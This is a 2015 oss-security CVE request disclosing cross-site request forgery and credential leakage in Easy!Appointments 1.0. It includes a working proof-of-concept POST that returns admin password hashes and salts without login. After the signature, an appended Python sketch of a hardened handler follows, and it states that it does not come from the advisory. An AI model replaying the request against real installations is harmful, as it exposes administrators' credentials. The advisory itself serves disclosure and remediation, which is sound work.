Message-ID: <20150727131421.GA20274@lakka.kapsi.fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org, Alex Tselegidis <alextselegidis@...il.com>
Subject: CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and
 Insufficiently Protected Credentials vulnerabilities


Product: Easy!Appointments Open Source Appointment Scheduler
Product URL: http://easyappointments.org/
Vendor: Alex Tselegidis
Vulnerability Type:
    Cross-Site Request Forgery (CWE-352)
    Insufficiently Protected Credentials (CWE-522)
Vulnerable Versions: 1.0
Fixed Version: next release
Vendor Notification: 2015-04-03
Solution Status: Fixed by vendor
Solution Date: 2015-05-28
Public Disclosure: 2015-07-27

Vulnerability Details:

The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request. The application transmits all user credentials to an unauthenticated user
and possibly allows other unauthorized actions.

Proof-of-concept without authentication:

"""
POST /ea/backend_api/ajax_filter_admins HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/ea/backend/users
Content-Length: 4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

key=
"""

Returns:

"""
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 10:28:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.4.39-0+deb7u2
Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 539

[{"id":"84","first_name":"Henri","last_name":"Salo","email":"email@...mple.com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}]
"""

Fixed in the following commit:
    https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326

Related commits to add CSRF protection:
    https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7
    https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840
    https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8
    https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54
    https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860

References:
    https://scapsync.com/cwe/CWE-352
    https://scapsync.com/cwe/CWE-522
    https://cwe.mitre.org/data/definitions/352.html
    https://cwe.mitre.org/data/definitions/522.html
    https://en.wikipedia.org/wiki/Cross-site_request_forgery
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet

-- 
Henri Salo
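The advisory shows an admin-filter endpoint answering an unauthenticated POST with every admin record, password hash and salt included. The following is an added illustration, not code from Easy!Appointments or from the advisory author, of the three properties the referenced fixes restore in a stand-in handler: a login check, a per-session CSRF token compared in constant time, and redaction of credential fields before the JSON reply. The session/form dicts, the `SAMPLE_ADMINS` record and the function names are constructed for this example.

```python
import hmac
import secrets

# Fields from the leaked "settings" object that must never leave the server.
CREDENTIAL_FIELDS = {"password", "salt"}

# Constructed sample record mirroring the shape of the leaked JSON response.
SAMPLE_ADMINS = [{
    "id": "84", "first_name": "Henri", "last_name": "Salo",
    "email": "email@example.com", "id_roles": "1",
    "settings": {"username": "henri", "password": "0" * 64,
                 "salt": "1" * 64, "notifications": "0"},
}]


class Forbidden(Exception):
    """Raised when a request fails the authentication or CSRF check."""


def new_session(user_id):
    """Login helper (constructed): issue a random per-session CSRF token."""
    return {"user_id": user_id, "csrf_token": secrets.token_hex(16)}


def redact(records):
    """Return copies of the records with credential fields stripped."""
    out = []
    for rec in records:
        clean = dict(rec)
        clean["settings"] = {k: v for k, v in rec.get("settings", {}).items()
                             if k not in CREDENTIAL_FIELDS}
        out.append(clean)
    return out


def leaks_credentials(records):
    """Response check: True if any record still carries a hash or salt."""
    return any(k in CREDENTIAL_FIELDS
               for r in records for k in r.get("settings", {}))


def filter_admins(session, form, records=SAMPLE_ADMINS):
    """Hardened stand-in for the admin filter handler (session = server-side
    session dict, form = POST body). Unauthenticated or token-less callers
    are rejected; matches are redacted before being returned."""
    if not session.get("user_id"):
        raise Forbidden("authentication required")
    expected, supplied = session.get("csrf_token", ""), form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        raise Forbidden("bad csrf token")
    key = form.get("key", "").lower()
    return redact([r for r in records
                   if key in (r["first_name"] + " " + r["last_name"]).lower()])
```

The `leaks_credentials` check is the kind of assertion worth keeping in an endpoint's test suite so a future refactor cannot silently reintroduce the disclosure.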
